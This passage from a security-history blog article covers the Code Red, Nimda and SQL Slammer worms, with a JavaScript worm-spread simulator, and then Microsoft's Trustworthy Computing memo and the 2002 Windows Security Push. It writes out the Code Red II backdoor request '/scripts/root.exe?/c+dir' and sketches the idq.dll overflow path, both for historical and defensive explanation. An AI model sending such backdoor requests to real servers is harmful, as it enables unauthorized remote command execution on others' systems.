&lt;p&gt;Code Red v2 was a rewritten worm using the same MS01-033 vulnerability but with a proper random scanner. The fix was tiny -- a different seed and a real entropy source -- and the consequences were huge. The CAIDA measurement, published by Moore, Shannon, and Brown in the Internet Measurement Workshop 2002, recorded the outbreak: &lt;strong&gt;&quot;On July 19, 2001, more than 359,000 computers connected to the Internet were infected with the Code-Red (CRv2) worm in less than 14 hours&quot;&lt;/strong&gt; [@caida-codered] [@cert-ca-2001-19-codered]. The peak rate was over 2,000 newly infected hosts per minute.&lt;/p&gt;
&lt;p&gt;The exploit path on each victim looked like this:&lt;/p&gt;

sequenceDiagram
    participant W as Worm host
    participant V as Victim IIS
    participant I as idq.dll
    participant S as LocalSystem shell
    W-&amp;gt;&amp;gt;V: HTTP GET /default.ida + long URL
    V-&amp;gt;&amp;gt;I: ISAPI dispatch to Indexing Service
    I-&amp;gt;&amp;gt;I: Buffer overflow in URL parse
    I-&amp;gt;&amp;gt;S: Shellcode runs in LocalSystem context
    S-&amp;gt;&amp;gt;S: Patch idq.dll in memory, install worm body
    S-&amp;gt;&amp;gt;W: Spawn 100 scanner threads
    Note over W,V: Each thread tries random IP:80, repeat
&lt;p&gt;The lesson that should have been read off Code Red v2 was a property of the population, not of the worm. The vulnerable population was large (anyone running IIS 4.0 or 5.0 with default modules enabled and the MS01-033 patch not applied), identical (every IIS install shipped the same &lt;code&gt;idq.dll&lt;/code&gt;), and reachable (TCP port 80 is by definition Internet-facing on a web server). That set of properties is the operational definition of a monoculture, and Code Red v2 was its first quantitative case study.&lt;/p&gt;
&lt;h3&gt;Code Red II (August 4, 2001)&lt;/h3&gt;
&lt;p&gt;Sixteen days after Code Red v2 saturated the IIS population, a &lt;em&gt;different&lt;/em&gt; worm appeared with a confusing name. &quot;Code Red II&quot; reused the MS01-033 vulnerability and the same &lt;code&gt;.ida&lt;/code&gt; injection vector, but the rest of it was unrelated to v1 or v2. eEye&apos;s August 4, 2001 analysis by Permeh and Maiffret documents the difference: where the earlier worms had a self-contained scanner-and-payload binary in memory, Code Red II dropped a copy of &lt;code&gt;cmd.exe&lt;/code&gt; named &lt;code&gt;root.exe&lt;/code&gt; into the IIS &lt;code&gt;/scripts&lt;/code&gt; and &lt;code&gt;/msadc&lt;/code&gt; directories, then dropped a trojanized &lt;code&gt;explorer.exe&lt;/code&gt; that re-enabled the C: and D: drives as the IIS virtual roots &lt;code&gt;/c&lt;/code&gt; and &lt;code&gt;/d&lt;/code&gt; [@eeye-codered-ii].&lt;/p&gt;
&lt;p&gt;The practical effect: any HTTP GET to &lt;code&gt;/scripts/root.exe?/c+dir&lt;/code&gt; on a compromised host returned a directory listing of the victim&apos;s &lt;code&gt;C:\&lt;/code&gt; drive, executed in the LocalSystem context. A permanent, anonymous, remote shell, reachable by anyone who knew the URL [@eeye-codered-ii].&lt;/p&gt;
&lt;p&gt;The lesson Code Red II adds: &lt;em&gt;one worm&apos;s residual artifact is another worm&apos;s propagation vector&lt;/em&gt;. Patching MS01-033 closed the door that let Code Red II in. It did not close the doors Code Red II left open behind it. A web server infected by Code Red II before its operator patched MS01-033 still had &lt;code&gt;root.exe&lt;/code&gt; waiting in &lt;code&gt;/scripts&lt;/code&gt;, indefinitely. The patching mental model -- &quot;apply the patch, the bug is fixed&quot; -- mismodels the state.&lt;/p&gt;
&lt;h3&gt;Nimda (September 18, 2001)&lt;/h3&gt;
&lt;p&gt;Six weeks later, exactly that mismodeling was exploited.&lt;/p&gt;
&lt;p&gt;The Nimda worm appeared on September 18, 2001, one week after the September 11 attacks, which the worm&apos;s name initially fed conspiracies about; &quot;nimda&quot; is &quot;admin&quot; backwards. The CERT/CC advisory CA-2001-26 records its four propagation vectors:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;(a) from client to client via email, (b) from client to client via open network shares, (c) from web server to client via browsing of compromised web sites, (d) from client to web server via active scanning for and exploitation of various Microsoft IIS 4.0 / 5.0 directory traversal vulnerabilities&quot; [@cert-ca-2001-26-nimda].&lt;/p&gt;
&lt;/blockquote&gt;

flowchart LR
    A[Infected client] --&amp;gt;|Email with readme.exe| B[New client via IE MIME bug MS01-020]
    A --&amp;gt;|Write to writable share| C[New client via SMB share]
    D[Infected IIS server] --&amp;gt;|Inject JS into served pages| E[New client via web browse]
    A --&amp;gt;|HTTP scan + Unicode traversal| F[New IIS server via dir traversal]
    F --&amp;gt;|Reuse Code Red II root.exe if present| F
    F --&amp;gt; D
&lt;p&gt;Some retellings give Nimda &quot;five&quot; propagation vectors, conflating distinct sub-paths or counting the reuse of Code Red II&apos;s &lt;code&gt;root.exe&lt;/code&gt; as a separate vector. CERT&apos;s canonical taxonomy, reproduced verbatim above, is four [@cert-ca-2001-26-nimda]. The fifth-vector phrasing in popular retellings is folk-knowledge.&lt;/p&gt;
&lt;p&gt;The connected-graph structure matters. The patch for the IIS Unicode directory-traversal bug (MS00-078, originally posted October 17, 2000) had been available for eleven months [@ms00-078-iis-traversal]. The patch for the IE MIME-handling bug (MS01-020, originally posted March 29, 2001) had been available for nearly six months [@ms01-020-ie-mime]. The MS01-033 patch behind Code Red and Code Red II had been available for three months [@ms01-033-idq]. Microsoft shipped the cumulative remediation as MS01-044 [@cert-ca-2001-26-nimda]. Every individual hole had been a known, patched single-issue vulnerability. Nimda took the graph of those holes and walked it.&lt;/p&gt;
&lt;p&gt;The lesson is structural. Response treats vulnerabilities as point fixes. Nimda&apos;s empirical evidence was that, in a sufficiently large monoculture, the unpatched subsets of multiple vulnerabilities had become &lt;em&gt;connected&lt;/em&gt;. Patching is a per-host, per-vulnerability operation; the attacker&apos;s view is the union over all hosts of the union over all unpatched vulnerabilities. The latter is a much larger surface.&lt;/p&gt;
&lt;h3&gt;SQL Slammer (January 25, 2003, 05:30 UTC)&lt;/h3&gt;
&lt;p&gt;Sixteen months after Nimda, the era&apos;s capstone arrived in the form of a 376-byte UDP datagram.&lt;/p&gt;
&lt;p&gt;Slammer (also called Sapphire) exploited a buffer overflow in the SQL Server Resolution Service that Microsoft had patched in MS02-039, &lt;strong&gt;six months earlier&lt;/strong&gt;. The payload was small enough to fit in a single UDP packet, and the protocol it targeted (UDP port 1434) was connectionless, so each scan was one packet, sent at line rate. The CAIDA measurement -- Moore, Paxson, Savage, Shannon, Staniford and Weaver, &lt;em&gt;IEEE Security &amp;amp; Privacy&lt;/em&gt; 2003 -- is the primary record:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&quot;Sapphire began to infect hosts slightly before 05:30 UTC on Saturday, January 25 (2003). [...] doubled in size every 8.5 seconds. [...] infected more than 90 percent of vulnerable hosts within 10 minutes [...] at least 75,000 hosts, perhaps considerably more [...] over 55 million scans per second.&quot; [@caida-slammer]&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Popular retellings often round Slammer&apos;s reach to &quot;75% of vulnerable SQL servers.&quot; The CAIDA primary measurement is &lt;strong&gt;~75,000 hosts&lt;/strong&gt; as the lower bound, and &quot;more than 90 percent of vulnerable hosts within 10 minutes&quot; as the saturation percentage [@caida-slammer]. The two figures are not the same.&lt;/p&gt;
&lt;p&gt;The 8.5-second doubling time is the load-bearing number. Worm spread under random-constant-spread (RCS) scanning follows a logistic curve: exponential at the start, saturating as the worm runs out of vulnerable targets. The differential equation is well behaved and was modeled in detail by Stuart Staniford, Vern Paxson, and Nicholas Weaver at USENIX Security 2002, in a paper that predicted (six months before Slammer) that worms with sufficiently high scan rates would saturate the global vulnerable population in minutes, not hours [@staniford-paxson-weaver-2002].&lt;/p&gt;
&lt;p&gt;Plug the parameters in and watch it happen:&lt;/p&gt;
&lt;p&gt;{`
// SI-style worm spread under random constant scanning.
// dN/dt = K * N * (1 - N/V)
// Where:
//   N(t) = infected population at time t (seconds)
//   V    = total vulnerable population
//   K    = effective contact rate per infected host per second
//          = (scans per second per host) * (V / address-space size)
//
// Slammer defaults (CAIDA Moore et al. 2003):
//   ~75,000 vulnerable MSSQL hosts (lower bound)
//   ~26,000 packets/sec sent from a typical infected host before bandwidth saturation
//   IPv4 routable space ~ 2^32 addresses, of which ~2^31 reachable
//
// Result: doubling time ~8.5 s, ~90% saturation in ~10 min.&lt;/p&gt;
&lt;p&gt;const V = 75000;
const scansPerSecPerHost = 26000;
const addressSpace = Math.pow(2, 31);
const K = scansPerSecPerHost * (V / addressSpace);
const dt = 1;
let N = 1;
let lastPrint = 0;
for (let t = 0; t &amp;lt;= 700; t += dt) {
  const dN = K * N * (1 - N / V);
  N += dN * dt;
  if (t - lastPrint &amp;gt;= 30 || (N &amp;gt;= V * 0.9 &amp;amp;&amp;amp; lastPrint &amp;lt; t)) {
    const pct = (100 * N / V).toFixed(1);
    console.log(`t=${t.toString().padStart(3)}s  N=${Math.round(N).toString().padStart(6)}  (${pct}%)`);
    lastPrint = t;
    if (N &amp;gt;= V * 0.999) break;
  }
}
`}&lt;/p&gt;
&lt;p&gt;The simulator says what CAIDA measured: saturation, regardless of where the human patch process starts from, in roughly ten minutes. Read that twice. There is no version of &quot;patch faster&quot; that wins this race. The race ends before a human operator can log in, open the bulletin, download the binary, and apply it. Even if every operator on the planet had been at their console with the patch staged and ready, they could not have outrun an 8.5-second doubling.&lt;/p&gt;

The logistic equation $dN/dt = KN(1 - N/V)$ has closed-form solution $N(t) = V / (1 + (V/N_0 - 1) e^{-Kt})$. The doubling time near the start (when $N \ll V$) is $\tau = \ln(2)/K$. For Slammer&apos;s measured doubling time of 8.5 seconds, $K = \ln(2)/8.5 \approx 0.0815$ per second. The time to reach 90% of $V$ from a seed of $N_0 = 1$ is $t_{90} = (1/K) \ln((V - N_0)/(N_0 \cdot V/(0.9V) - N_0)) \approx (1/K) \ln(0.9V/0.1) \approx (1/0.0815) \ln(9V)$. For $V = 75{,}000$, $t_{90} \approx 12.3 \cdot \ln(675{,}000) \approx 165$ seconds, plus the time spent in the slow start-up phase from $N_0=1$ to a few hundred infections. The empirical 10-minute figure includes both phases. The structural result is parameter-insensitive: any worm with a per-host scan rate that produces a sub-minute doubling will saturate before any human operator can intervene.
&lt;p&gt;If the attacker&apos;s loop (find bug, weaponize, propagate) is now structurally faster than the defender&apos;s loop (find bug, ship patch, customer installs), then &quot;patch faster&quot; stops being the answer and a different answer becomes necessary. The only durable defense against a sub-minute doubling time is to &lt;strong&gt;ship fewer vulnerabilities to begin with&lt;/strong&gt;. That requires changes upstream of the patch pipeline -- in how code is written, reviewed, tested, and signed off.&lt;/p&gt;
&lt;p&gt;Which is what the advisory version of secure development had been preaching since 1975.&lt;/p&gt;
&lt;p&gt;So why was Microsoft still shipping &lt;code&gt;idq.dll&lt;/code&gt;-class bugs in 2001?&lt;/p&gt;
&lt;h2&gt;5. What Microsoft Already Had (and Why It Wasn&apos;t Enough)&lt;/h2&gt;
&lt;p&gt;This is the section that confronts the literal thesis head-on. Take an inventory of what existed, in Microsoft and outside it, on January 1, 2002:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;a href=&quot;https://paragmali.com/blog/windows-security-boundaries-the-document-that-decides-what-g/&quot; rel=&quot;noopener&quot;&gt;Microsoft Security Response Center (MSRC)&lt;/a&gt;.&lt;/strong&gt; Founded in 1998 to coordinate vulnerability disclosure and ship security bulletins (the numbered series MS98-001 onward) [@msrc-org] [@howard-lipner-push-2003]. The org chart was real; so was the bulletin pipeline; so was the working relationship with CERT/CC and external researchers.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Secure Windows Initiative (SWI).&lt;/strong&gt; Started around 2000 as a small in-house secure-development team, led by Michael Howard inside the Windows division [@howard-lipner-push-2003].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;STRIDE.&lt;/strong&gt; A categorical list of threat types (Spoofing, Tampering, Repudiation, Information disclosure, Denial of service, Elevation of privilege), written by Loren Kohnfelder and Praerit Garg in an internal Microsoft memo dated April 1, 1999, titled &quot;The Threats to Our Products.&quot; The memo is no longer hosted on Microsoft&apos;s own site, but it has been publicly preserved at Adam Shostack&apos;s archive [@shostack-stride-memo-archive], with an independent mirror at FIRST [@first-stride-memo-mirror]; Shostack&apos;s 2014 book remains the authoritative chain-of-custody analysis [@shostack-tm-book].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A Microsoft-authored secure-coding book.&lt;/strong&gt; Michael Howard and David LeBlanc&apos;s &lt;em&gt;Writing Secure Code&lt;/em&gt;, Microsoft Press, first edition November 2001 -- two months before the memo. Bill Gates is widely reported to have required Microsoft engineers to read it; the book itself documents the banned-API list, threat-modeling templates, and STRIDE walkthroughs that the Push later mandated [@howard-leblanc-wsc].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Outside Microsoft, the substrate was older still:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Saltzer and Schroeder.&lt;/strong&gt; Jerome Saltzer and Michael Schroeder, &quot;The Protection of Information in Computer Systems,&quot; &lt;em&gt;Proceedings of the IEEE&lt;/em&gt; 63(9), September 1975. Eight design principles -- economy of mechanism, fail-safe defaults, complete mediation, open design, separation of privilege, least privilege, least common mechanism, psychological acceptability -- still the textbook starting point [@saltzer-schroeder-1975].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The Orange Book.&lt;/strong&gt; DoD Trusted Computer System Evaluation Criteria (DoD 5200.28-STD), 1983 and reissued 1985. Graded assurance levels D, C1, C2, B1, B2, B3, A1. The pre-existing vocabulary of &quot;trusted computing&quot; that the Gates memo deliberately echoed and broadened to &quot;trustworthy&quot; [@tcsec-orange-book].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;OpenBSD audit culture.&lt;/strong&gt; Theo de Raadt&apos;s OpenBSD project, since the summer of 1996, with a permanent audit team that the project&apos;s own page describes verbatim: &quot;Our security auditing team typically has between six and twelve members who continue to search for and fix new security holes. We have been auditing since the summer of 1996&quot; [@openbsd-security].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Attack trees.&lt;/strong&gt; Bruce Schneier, &quot;Attack Trees,&quot; &lt;em&gt;Dr. Dobb&apos;s Journal&lt;/em&gt;, December 1999. A formal methodology for describing system security as goal-rooted decision trees with AND/OR composition and per-leaf cost annotations [@schneier-attack-trees-1999].&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;CERT/CC.&lt;/strong&gt; Carnegie Mellon&apos;s Computer Emergency Response Team, founded November 1988 in response to the Morris worm. Author of the CA-1999-04 / CA-2001-19 / CA-2001-26 / CA-2000-04 advisories that frame the previous two sections [@cert-ca-1999-04-melissa] [@cert-ca-2001-19-codered] [@cert-ca-2001-26-nimda] [@cert-ca-2000-04-iloveyou].&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Lay those rows out as a table and look at the right-most column:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Discipline component&lt;/th&gt;
&lt;th&gt;Who had it&lt;/th&gt;
&lt;th&gt;When&lt;/th&gt;
&lt;th&gt;Release-blocking authority?&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Foundational principles&lt;/td&gt;
&lt;td&gt;Saltzer and Schroeder [@saltzer-schroeder-1975]&lt;/td&gt;
&lt;td&gt;1975&lt;/td&gt;
&lt;td&gt;No (academic publication)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Graded assurance criteria&lt;/td&gt;
&lt;td&gt;DoD Orange Book [@tcsec-orange-book]&lt;/td&gt;
&lt;td&gt;1985&lt;/td&gt;
&lt;td&gt;No (procurement criterion only)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Response coordination&lt;/td&gt;
&lt;td&gt;CERT/CC [@cert-ca-1999-04-melissa]&lt;/td&gt;
&lt;td&gt;1988&lt;/td&gt;
&lt;td&gt;No (external coordinator)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Audit-driven engineering&lt;/td&gt;
&lt;td&gt;OpenBSD [@openbsd-security]&lt;/td&gt;
&lt;td&gt;1996&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Yes -- within OpenBSD only&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Vendor response center&lt;/td&gt;
&lt;td&gt;MSRC [@msrc-org] [@howard-lipner-push-2003]&lt;/td&gt;
&lt;td&gt;1998&lt;/td&gt;
&lt;td&gt;No (post-release)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Internal threat categorization&lt;/td&gt;
&lt;td&gt;Kohnfelder and Garg STRIDE memo [@shostack-tm-book] [@shostack-stride-memo-archive]&lt;/td&gt;
&lt;td&gt;April 1999&lt;/td&gt;
&lt;td&gt;No (advisory)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;External threat-modeling methodology&lt;/td&gt;
&lt;td&gt;Schneier attack trees [@schneier-attack-trees-1999]&lt;/td&gt;
&lt;td&gt;December 1999&lt;/td&gt;
&lt;td&gt;No (publication)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;In-house secure-development team&lt;/td&gt;
&lt;td&gt;SWI (Howard) [@howard-lipner-push-2003]&lt;/td&gt;
&lt;td&gt;~2000&lt;/td&gt;
&lt;td&gt;No (advisory)&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Secure-coding book&lt;/td&gt;
&lt;td&gt;Howard and LeBlanc [@howard-leblanc-wsc]&lt;/td&gt;
&lt;td&gt;November 2001&lt;/td&gt;
&lt;td&gt;No (recommendation)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;The load-bearing column is the last one. Every row except OpenBSD-within-OpenBSD reads &lt;strong&gt;No&lt;/strong&gt;, and OpenBSD&apos;s &quot;Yes&quot; is a special case -- the auditors and the engineers were the same self-selected community on a small homogeneous codebase shipped without a revenue obligation.&lt;/p&gt;
&lt;p&gt;That column is the article&apos;s first aha moment.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Microsoft was not the first to articulate secure-systems-design principles (Saltzer and Schroeder, 1975). It was not the first to do audit-driven engineering (OpenBSD, 1996). It was not the first to popularize threat modeling externally (Schneier, December 1999), have an internal threat-categorization framework (Kohnfelder and Garg, April 1999), or run a security-response organization (CERT/CC since 1988; MSRC since 1998). What Microsoft &lt;em&gt;was&lt;/em&gt; first to do, on January 15, 2002 and operationalized on February 11, 2002, was apply &lt;strong&gt;release-blocking executive authority across an entire dominant-platform vendor&lt;/strong&gt; to make secure development a non-negotiable engineering gate.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The corrected sentence is harder to fit on a magazine cover. It is also defensible.&lt;/p&gt;

OpenBSD shipped audit-driven engineering culture six years before the Windows Security Push, with the slogan its security page has carried for two decades:
Only two remote holes in the default install, in a heck of a long time! -- OpenBSD Project, security page [@openbsd-security]
&lt;p&gt;OpenBSD&apos;s model worked for a small homogeneous codebase with self-selected auditors and a permissive-license, no-revenue context. The SDL&apos;s model was built for a fifty-thousand-person, hundred-million-line, quarterly-revenue context. They are parallel paths, not competitors. The era&apos;s lesson is that &lt;em&gt;both&lt;/em&gt; were necessary discoveries; neither alone would have served the other&apos;s population.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;
&lt;p&gt;What did &quot;advisory&quot; mean in 2000-2001 Microsoft? Steve Lipner&apos;s ACSAC 2004 paper is explicit: in the pre-Push state, an engineering manager could decline a security review with no organizational consequence. SWI could &lt;em&gt;recommend&lt;/em&gt;. SWI could not &lt;em&gt;require&lt;/em&gt;. The Microsoft-authored book sat on every engineer&apos;s desk and the threat-categorization memo had been internal for almost three years -- and Code Red v1, Code Red v2, Code Red II, and Nimda all exploited code that had shipped &lt;em&gt;after&lt;/em&gt; SWI&apos;s founding [@howard-lipner-push-2003] [@lipner-acsac-2004].&lt;/p&gt;
&lt;p&gt;That is the empirical evidence the era ran on. Methods without authority did not stop the worms.&lt;/p&gt;

Microsoft was not the first to articulate, audit, popularize, categorize, or respond. Microsoft was the first to make secure development non-negotiable at desktop-monopoly scale.
&lt;p&gt;So if the methods, the books, the threat-modeling framework, the response center, the engineers, and the public peer pressure were all already there, what changed at 5:22 PM Pacific on Tuesday, January 15, 2002?&lt;/p&gt;
&lt;h2&gt;6. The Memo (January 15, 2002)&lt;/h2&gt;
&lt;p&gt;Open with the email header itself, preserved verbatim by Wired&apos;s republication and the Help With Windows mirror, both of which kept the original &lt;code&gt;From:&lt;/code&gt;, &lt;code&gt;Sent:&lt;/code&gt;, &lt;code&gt;To:&lt;/code&gt;, &lt;code&gt;Subject:&lt;/code&gt; block intact:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;-----Original Message-----
From: Bill Gates
Sent: Tuesday, January 15, 2002 5:22 PM
To: Microsoft and Subsidiaries: All FTE
Subject: Trustworthy computing
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;[@gates-memo-wired] [@helpwithwindows-billg]&lt;/p&gt;
&lt;p&gt;Popular retellings sometimes describe the memo as a &quot;5 AM email Bill Gates wrote in the dark.&quot; The preserved mail headers above are unambiguous: the memo was sent at &lt;strong&gt;5:22 PM Pacific&lt;/strong&gt; on a Tuesday afternoon, with full distribution to &quot;Microsoft and Subsidiaries: All FTE&quot; -- every full-time employee of the company [@gates-memo-wired] [@helpwithwindows-billg]. The 5 AM phrasing is folk-knowledge; the headers preserved by Wired are the primary record.&lt;/p&gt;
&lt;p&gt;The memo runs roughly 1,500 words. It is structured around four pillars -- Security, Privacy, Reliability, and Business Integrity -- that, the memo argues, must take precedence over feature work whenever the two are in tension [@gates-memo-wired]:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Pillar&lt;/th&gt;
&lt;th&gt;What the memo asks for&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Security&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Code resilient to attack; products that ship secure out of the box, by default, in deployment.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Privacy&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Products that handle customer data with informed consent and minimal collection.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Reliability&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Products that fail predictably and recover gracefully; uptime as a measurable property.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Business Integrity&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Transparent dealings; respect for the customer relationship across the company&apos;s behavior, not just its products.&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Read the four together and the structure is not a list of features. It is a redefinition of what shipping the product &lt;em&gt;means&lt;/em&gt;. A Windows release in 2001 shipped when the feature list closed; the memo proposed that, going forward, a Windows release ships when feature list, security posture, privacy posture, reliability posture, and the company&apos;s standing with the customer were all simultaneously acceptable.&lt;/p&gt;
&lt;p&gt;The operational anchor of the memo is one sentence every subsequent retelling quotes, and that the Push directly inherited as its decision rule:&lt;/p&gt;

&quot;When we face a choice between adding features and resolving security issues, we need to choose security.&quot; -- Bill Gates, &quot;Trustworthy computing&quot; memo, January 15, 2002 [@gates-memo-wired]
&lt;p&gt;Note what the memo &lt;em&gt;did not do&lt;/em&gt;. It did not name an algorithm. It did not invent STRIDE; STRIDE had been internal for two and a half years already [@shostack-tm-book]. It did not write &lt;code&gt;banned.h&lt;/code&gt;; the banned-API list had been in Howard and LeBlanc&apos;s book on bookshelves for two months [@howard-leblanc-wsc]. And, contrary to a common retelling, it did not delay the launch of Visual Studio .NET.&lt;/p&gt;
&lt;p&gt;Visual Studio .NET launched on schedule on &lt;strong&gt;February 13, 2002&lt;/strong&gt;, four weeks after the memo, at the VSLive! 2002 Conference in San Francisco, with Bill Gates delivering the keynote address [@msft-news-vsnet-launch-2002]. The December 2001 work the retrospectives sometimes call a &quot;delay&quot; was a &lt;em&gt;pre-launch security review&lt;/em&gt; of the .NET runtime; the memo references that review by name as the &lt;strong&gt;template&lt;/strong&gt; for what the company was about to do across every product [@gates-memo-wired]. The &quot;delayed by security&quot; framing is folk-knowledge; the memo itself describes VS .NET&apos;s December review as a success story.&lt;/p&gt;
&lt;p&gt;What the memo &lt;em&gt;did&lt;/em&gt; do was supply the one input every other piece on the table had been missing: &lt;strong&gt;executive authority, top-down, to halt feature work on security grounds without arguing about it.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;To see why that is the operational form of the memo&apos;s contribution, compare it to Gates&apos;s two other priority memos. The &quot;Internet Tidal Wave&quot; of May 26, 1995 redirected Microsoft toward the web; the company restructured around online services and browser strategy in its wake [@gates-tidal-wave-bbc-pdf]. The &lt;strong&gt;.NET / NGWS strategy memo&lt;/strong&gt;, delivered alongside Gates&apos;s Forum 2000 keynote on &lt;strong&gt;June 22, 2000&lt;/strong&gt;, redirected the company toward managed code and a unified runtime; Visual Studio .NET, the CLR, ASP.NET, and ADO.NET all trace to it.Common retellings date the .NET strategy memo to 1999. The Microsoft News Center record places the NGWS / .NET unveiling at Forum 2000 on &lt;strong&gt;June 22, 2000&lt;/strong&gt;; the strategy was branded &quot;Next Generation Windows Services&quot; before the .NET name stuck. The 1999 dating slips in because the underlying COM-runtime work began earlier, but the company-wide priority memo is a 2000 document.&lt;/p&gt;
&lt;p&gt;Both pointed Microsoft at something new. Trustworthy Computing was different in shape. It did not redirect the company toward something new. It &lt;em&gt;halted&lt;/em&gt; the company in place. The pillars were not a roadmap; they were a precondition. That structural difference -- &lt;em&gt;stop, before you start anything else&lt;/em&gt; -- is what gave the Push its character.&lt;/p&gt;

The memo named three deputies who would carry the program forward. Craig Mundie (then Microsoft&apos;s chief technical officer, leading the Trustworthy Computing leadership team) was the named architect of the Trustworthy Computing initiative itself [@msft-news-charney-jan-2002]; Jeff Raikes (then Group Vice President for Productivity and Business Services) carried the program into Office [@msft-news-raikes-fusion-2002]; and on January 31, 2002 -- sixteen days after the memo -- Microsoft announced the hire of Scott Charney from PricewaterhouseCoopers&apos; Cybercrime Prevention and Response Practice as Chief Security Strategist, with a start date of April 1, 2002, to make the program operationally permanent [@msft-news-charney-jan-2002]. Charney would lead Microsoft&apos;s Trustworthy Computing organization for the next thirteen years. The memo was one event; the people who made it survive past the ten-week Push were the institutional half of the story.
&lt;p&gt;The memo was the discrete institutional moment. What it required next was the operationalization step that converted it from rhetoric into engineering. That step took twenty-seven days to start and roughly ten weeks to run.&lt;/p&gt;
&lt;h2&gt;7. The Windows Security Push (February-April 2002)&lt;/h2&gt;
&lt;p&gt;The mechanics come from Michael Howard and Steve Lipner&apos;s IEEE &lt;em&gt;Security and Privacy&lt;/em&gt; paper of January-February 2003, &quot;Inside the Windows Security Push,&quot; and from Lipner&apos;s December 2004 ACSAC paper &quot;The Trustworthy Computing Security Development Lifecycle.&quot; Stripped of the framing, the numbers are:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Feature work in the Windows Division halted on or about &lt;strong&gt;February 11, 2002&lt;/strong&gt; [@howard-lipner-push-2003].&lt;/li&gt;
&lt;li&gt;The Push ran for approximately &lt;strong&gt;ten weeks&lt;/strong&gt;, through April 2002 [@howard-lipner-push-2003].&lt;/li&gt;
&lt;li&gt;The participating headcount was approximately &lt;strong&gt;8,500 Windows engineers&lt;/strong&gt; [@howard-lipner-push-2003].The round figure of &quot;10,000 engineers&quot; in many retrospectives is a company-wide aggregate that includes the &lt;em&gt;serial&lt;/em&gt; Office, .NET, and SQL Server pushes that followed through 2002-2003. The Windows-only Push figure from the Howard and Lipner primary is &lt;strong&gt;~8,500&lt;/strong&gt;; the trade-press corroboration (Washington Technology, July 2002) cross-references Gates&apos;s own July 19, 2002 internal newsletter [@howard-lipner-push-2003] [@washtech-microsoft-100m].&lt;/li&gt;
&lt;li&gt;The total cost in foregone feature work was approximately &lt;strong&gt;$100 million&lt;/strong&gt; [@washtech-microsoft-100m] [@howard-lipner-push-2003].&lt;/li&gt;
&lt;li&gt;The measurable outcome was approximately a &lt;strong&gt;50% reduction in publicly reported security vulnerabilities&lt;/strong&gt; for Windows Server 2003 over comparable post-release windows versus Windows 2000 [@howard-lipner-push-2003].The ~50% figure is per-window externally-discovered vulnerability counts, per Howard and Lipner 2003 -- &lt;em&gt;not&lt;/em&gt; per-KLoC defect density. The narrative role (measurable post-release improvement) holds either way, but the caveat matters for readers reusing the number.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The Push pipeline looked like this:&lt;/p&gt;

flowchart LR
    A[Mandatory training: Howard, Lipner, LeBlanc as instructors] --&amp;gt; B[STRIDE threat model per component]
    B --&amp;gt; C[Banned-API audit against banned.h and strsafe.h]
    C --&amp;gt; D[Fuzz testing of network-facing components]
    D --&amp;gt; E[Final Security Review gate]
    E --&amp;gt; F[Release approval or block]
&lt;p&gt;Three of the boxes in that pipeline need definitions, because they are the load-bearing terms the rest of the article and every SDL descendant inherit.&lt;/p&gt;

